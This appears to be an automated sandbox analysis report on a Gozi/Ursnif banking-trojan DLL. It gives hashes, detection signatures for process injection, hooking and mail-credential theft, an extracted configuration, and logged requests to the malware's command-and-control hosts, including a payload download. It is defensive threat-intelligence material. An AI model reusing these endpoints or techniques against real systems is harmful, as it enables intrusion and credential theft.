Analysis Report crypt_3300.dll

Overview

General Information

Sample Name: crypt_3300.dll
Analysis ID: 343315
MD5: 1f760b56c552060d55aa4a2902133e1f
SHA1: a7b95e6aa8cb4d2fb83da38a78bb6964ffe4bd8f
SHA256: 2b8c7b7112e8070d01b2f977c360772e05704fff1838bf124780b9c8b699f337
Tags: dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: regsvr32.exe.5720.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "177", "system": "e19be6dad02dea156580dfb2e09e5e52hh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611371430", "user": "1082ab698695dc15e71ab15c82c4a804", "hash": "0xa6ea74ae", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Source: api3.lepini.at Virustotal: Detection: 10% Perma Link
Source: api10.laptok.at Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: crypt_3300.dll Virustotal: Detection: 7% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: crypt_3300.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49736 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.440428591.000001FC308B0000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.449984223.00000241EFD80000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.463267415.00000000057E0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000026.00000000.477442156.000000000E420000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00A5E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00A6888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A74FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00A74FE1
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 38_2_03B5B9E8
Source: C:\Windows\explorer.exe Code function: 38_2_03B5ECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 38_2_03B5ECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A605EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00A605EF

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/CFw0exYOLBE1WOQ6Mn_2BQq/AbMRr9o39B/QrT2i_2BUXb4t9pmn/0lERtiOHlDPB/RvBQZDQ0_2B/XcdNPmTbjSCSkh/LGQj235_2Bzaj4iiE_2BZ/8BOeUfWxCKBDqbW5/305v3z_2Ba56K_2/BNLTprCr0kysMxydNd/QsemKPZya/UWdQMBXIKo51HLvlVE_2/F3BBwvriajKBQr8Ak4R/aT9_2Bw9XoTYMHGlK7kzVs/5gAtMcR1uDZ1K/ECQPLzKd/mvsohtKAfiZi1BZl2tbNMzk/iXtWcjTRcn/5oeMCiT_2BqRqn61F/cBlYM5UfYYiG/Fi3kDfXZStE/6LqXXR_2F0pKhw/O_2Brkkk/_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/a_2Bz4YtSSFgT/0C5wRpet/ms8q1CZiIpjOdJS4vfA_2BH/Unc80mniR4/LWmVTbc4wtziyZI4c/s8JLaiXVyJRz/Ia68C_2BiO1/v0aHN6LC2uzwce/oGYSvt_2FR9qcBq8fN2ZR/l4rY1Qe5NTT0wAlG/U6poigPerNGHrZu/8qcNuouKcdOcsfERjf/Dfr4PAcFd/vSa3xs7frQEfOOeZB0vB/vZy6iry9vQbVgCKSl4S/0bhQUTeB7wVuA8lFu_2FvC/mrJ4FGk4dNxHd/NvkUgggq/QTKdhVP6VWf6cx1FjBJVmjH/mbHnltL2SM/BqdtHsO_2BXjavC29/BKgPQ6DT/TlOI0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/97Bobw5s_2BJD9JdpaeHl/eaFIuMTgpYC6kyVz/wkVXHzbguzU8joj/iVFWbWAdj_2B9KihCY/jMd9cLfS3/oUwhf1e4_2BfL6_2FnUw/GLpqU7X6eDSfadKgO93/vdNVieORUa2lyA9rRTGL_2/FZE66To6WbaMR/57fzsKgx/FORuzev7x9UGQWVFO_2Bpeg/Wvs_2BYY_2/FsZiQOB29KHr_2Fal/WE_2F_2Fhffr/YZCPuD4E3bZ/RTtWZ0xleQwCeU/RtKoykqxZaK3WHH71HVec/H322WPBdAyKedu47/SMQTtvEQEYL6Ruh/BdDKv8Vz_2FBmqrfdt/A_2F9Y1cY/8wr9fecB_2FBDRCD/5p5CM HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2BiwLk/OvzwM3VHZTr_/2Bi5hCWeweE/RDbM_2FDLormln/D5u23sLsNQY4uTSsot2UU/aPO_2FNPBiGyGyqq/s7z4x4ukwrK32If/M9iLwjW2qV3Vr8dNGH/q140lsiDv/T7miJKK0tGN_2FJkKKLX/Cm6sjguLhyPX9arxoel/JMM2f5VEC0AG9Wn6vSkHjJ/nDToUkTHrKvpT/3Wk4CBsP/r0HCE6xNU4Qc_2FkWiw3FEh/ucPyPfDjzrsgr097bADyD/Lr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5/5R_2FdKLiGt3q/T_2FbZYT/PDvrYRscHMvAhEzl_2F_2B0/2ikk6uOsaJ/kIfnZQ1ztpC62gFGv/P1mqwU8mDefG/yjBn2N1MiSD/GUZwJFX3oztFwR/onkOOAeBD5WkYQs_2FJht/8kT_2FI3gWn_2BJh/eIjqJ1W8_2FQNm2/Ia6dzqJh5iH4SrCJDK/5Piz1ULur/BABO6rSkLO4ShfMGkMUu/cDt8M0heKfxbEyNRecC/6zuUh3b4d0zydbKfh/4j1x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000026.00000000.472927251.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021012220210123: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/TZTh6_2BkS3c6X/g2npKVRL7cED2dW4yfoz7/1IAgoDfDBaFBh7Kf/s6YPUhhW_2FFOZ4/UfzmASW14dw3GpBMgd/QQTnLy2bn/m47chdfHlbOoStOxiBbF/PVT2YFBWKLhFbou4dcn/rE5edFIASJWWcLmRPujXLx/YI4PYsQdo9LaX/3eFG1EEZ/Sr_2BcwaypXnMHBWu5GiCkg/zhC1mAh91E/nklp0T0h9PwUy8pf3/AvjhI9VAq5aQ/c4y8dg0dcfo/9agKfUuutMqiH4/39h5RIbncwwhgCP2Fp4X_/2F1RiD0H_2BsV2ed/FGqO7Z8iv/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Jan 2021 18:10:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000026.00000000.459198424.0000000001640000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/97Bobw5s_2BJD9JdpaeHl/eaFIuMTgpYC6kyVz/wkVXHzbguzU8joj/iVFWbWAdj_2B
Source: explorer.exe, 00000026.00000000.473168736.0000000008C78000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/97Bobw5s_2BJD9JdpaeHl/eaFIuMTgpYC6kyVz/wkVXHzbguzU8joj/iVFWbWAdj_2B9KihC
Source: explorer.exe, 00000026.00000002.628178398.00000000053A0000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/aswBTjQ4E_2B_/2FPVHi26/F6MnWvHM59IfwFvPMyloaUi/ZdEXHmjh9l/GuUpdE5gAL_2Biw
Source: explorer.exe, 00000026.00000002.628178398.00000000053A0000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/yZN5x8AU1/f2l9_2BDk3SyJKCm0b9b/CpWCXqygnlCMKczKhFt/aUvaHjWobYkO38UNm53uP5
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, explorer.exe, 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, explorer.exe, 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, regsvr32.exe, 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, explorer.exe, 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001E.00000002.487850335.00000274579D0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001E.00000002.487605834.00000274577C1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
